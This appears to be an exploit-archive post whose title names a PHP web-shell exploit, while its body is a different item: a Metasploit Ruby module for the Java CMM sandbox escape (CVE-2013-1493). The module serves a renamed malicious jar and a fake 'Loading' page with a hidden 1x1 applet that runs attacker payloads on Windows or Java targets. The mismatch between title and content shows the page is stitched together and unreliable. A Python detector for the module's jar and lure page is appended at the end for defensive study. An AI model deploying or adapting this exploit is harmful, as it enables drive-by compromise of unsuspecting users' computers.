STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Only the Init class name is randomized; the other three keep their names.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Lure page: a 1x1 applet whose archive name is random but always ends in .jar.
  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
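As an added defensive example (not part of the original post or of the Metasploit module): the module randomizes only the Init class name and the "metasploit"/"Payload" strings, while Leak.class, MyBufferedImage.class and MyColorSpace.class go into the served jar verbatim, and the lure page embeds a 1x1 applet with a .jar archive. The Python below checks a captured jar and page for exactly those artefacts; the jar it builds is constructed in memory for testing and carries no real bytecode.

```python
import io
import re
import zipfile

# Entry names the module adds to its jar verbatim; only Init.class is renamed.
FIXED_CLASSES = {"Leak.class", "MyBufferedImage.class", "MyColorSpace.class"}

# Lure page pattern from generate_html: a 1x1 applet whose archive is a .jar.
APPLET_RE = re.compile(
    r'<applet\s[^>]*archive="[^"]+\.jar"[^>]*width="1"\s+height="1"', re.I)


def inspect_jar(data: bytes) -> dict:
    """Report which of the fixed class names a jar (zip) contains."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = {info.filename for info in zf.infolist()}
    except zipfile.BadZipFile:
        return {"valid": False, "hits": [], "match": False}
    hits = sorted(FIXED_CLASSES & names)
    # All three travelling together in one archive is the module's signature.
    return {"valid": True, "hits": hits, "match": len(hits) == len(FIXED_CLASSES)}


def looks_like_lure(html: str) -> bool:
    """True when the page carries the module's 1x1 applet tag."""
    return APPLET_RE.search(html) is not None


def build_sample_jar(entries: list) -> bytes:
    """Constructed test jar: entries hold class-file magic only, not real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        for name in entries:
            zf.writestr(name, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed inputs shaped like what the module serves (random names there).
    suspicious = build_sample_jar(["Qxzv.class", *sorted(FIXED_CLASSES)])
    benign = build_sample_jar(["Main.class", "Util.class"])
    lure = '<applet archive="abcdefgh.jar" code="Qxzv.class" width="1" height="1"></applet>'
    print(inspect_jar(suspicious))  # match: True
    print(inspect_jar(benign))      # match: False
    print(looks_like_lure(lure))    # True
```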